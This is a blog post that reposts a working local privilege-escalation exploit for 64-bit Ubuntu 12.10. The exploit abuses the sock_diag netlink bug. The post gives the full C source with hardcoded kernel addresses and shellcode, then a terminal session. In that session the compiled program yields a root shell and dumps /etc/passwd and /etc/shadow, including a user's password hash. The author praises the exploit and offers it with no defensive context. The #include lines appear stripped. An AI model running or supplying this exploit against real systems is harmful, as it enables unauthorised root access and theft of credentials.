Home Unlabelled Ubuntu 12.10 Local Root Exploit

Ubuntu 12.10 Local Root Exploit

By
Wednesday, March 13, 2013
Read
Add Comment
Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char    buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64 */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

        printf("mmap fault\n");
        exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);
    if(!getuid())
        system("/bin/sh");
}




test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c  ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
 # cat /etc/shadow
 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::




This is really great !

Source: http://www.exploit-db.com/exploits/24746/
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us